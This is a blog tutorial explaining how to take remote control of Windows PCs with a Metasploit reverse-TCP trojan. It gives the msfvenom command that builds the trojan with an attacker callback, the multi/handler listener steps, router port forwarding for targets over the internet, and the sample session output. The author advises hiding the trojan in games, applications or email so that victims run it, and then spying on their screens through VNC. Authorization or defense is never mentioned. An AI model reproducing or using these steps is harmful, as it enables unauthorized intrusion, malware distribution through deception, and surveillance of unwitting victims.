hack-windows-10-metasploit-khromozome

How to hack windows 10 using kali linux remotely with metasploit – 2018

Microsoft claims that windows 10 has fixed all security vulnerabilities. We cant hack a windows PC with a remote exploit like ” ms08_067_netapi ” anymore. Windows have fixed that vulnerability. so sad. wait a minute, Then how can we hack a windows pc is that even possible now? The answer is yes, windows machines are still vulnerable to Trojan attacks regardless of versions. With this method you can hack any windows machines 10,8.1,8,7,vista and xp.

A trojan or a backdoor can give access to target machine remotely. we all know that, I’m not going too deep in explaining what a trojan is. Here we gonna use reverse_tcp trojan. This is a specially crafted malware that establish a remote connection to the hacker’s machine over Transition Control Protocol from the victim machine. This allows the hacker to breach into the machine and take full control over it.

Metasploit framework is one of the best tool that i love in kali linux. It has both handler and payload generator. Once the payload get executed on the target machine while the we are on listening mode in the handler section it spawns a meterpreter shell. This meterpreter shell allow us to communicate with the target system and execute shell commands. Compared to normal shell meterpreter has plenty of options. This can be done while the target is on the same LAN network or over the internet, there is no difference you just have to configure the router and payload accordingly. This process is dead simple. Follow the steps.

 

Demo Video

 

 

Router Configuration

This step is very important when your target is over the internet or WAN. Ignore this step if your target is on same LAN. To hack a pc over the internet means you have to communicate in both direction. To do this, your router/modem should open a port of your machine. This is called port forwarding. By default all ports are closed by your router/modem. Open a browser go to url http://192.168.1.1 Type in your username and password (by default password and username will be “admin“). This will take you to the router settings. Go to Advanced settings find port forwarding. Now click on add new set the start and end port to 444 (since we are using port 444 on metasploit). In the Ip address field you must type in your linux machine’s  internal ip. Save settings. you are done. You can double check by scanning your port with online port scanners.

 

 

Generate the Trojan

Generate the payload using msfvenom. set the port to 444 and ip to your public IP or local IP depending on your target.The generated trojan will try to connect to This IP and port when its executed. following command will generate the trojan in .exe format.
MOST COMMON ERROR: validating LHOST on creation see this thread – create-windows-meterpreter-payload-that-resolve-execution
# msfvenom -p windows/meterpreter/reverse_tcp   — platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe
  
A trojan will be generated in the desktop. keep it aside and move on to handler section. fire up metasploit and follow the steps.
# msfconsole

Wait for a minute, msfconsole will come up. Use handler then, set payload and port.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler…

 

 

Execute the payload

Now you have to execute your trojan on the target system. Distributing the raw exe file is a bad idea, better encode it and attach with a normal application or a game or even email. once out trojan is in and executed a meterpreter session will be spawned.
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler…
[*] Sending stage (83170 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.104:444 -> 192.168.1.105:36028) at 2016-05-20 03:20:45 -0500
meterpreter >
Meterpreter session allows you to execute system commands, networking commands, spy the screen and much more.

use help command to see the whole list of commands

meterpreter > help

Use this command to run vnc session and spy the target

meterpreter > run vnc
This whole process is simple but, the toughest part is getting the trojan in to the target user. Attaching the file along with games works great.
Read my blog on Privilege escalation in windows to know how to get admin privilege in a hacked system.

 Any doubts or questions? Ask it on our new hackers Q and A forum askthehackers.com
Ask a Question


susmith HCK

susmith HCK Author

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.